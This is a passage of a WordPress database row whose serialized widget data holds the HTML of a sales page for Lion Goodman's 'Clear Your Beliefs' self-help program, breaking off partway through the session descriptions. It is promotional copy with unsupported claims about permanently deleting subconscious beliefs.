(1892, 2173, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71342:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This 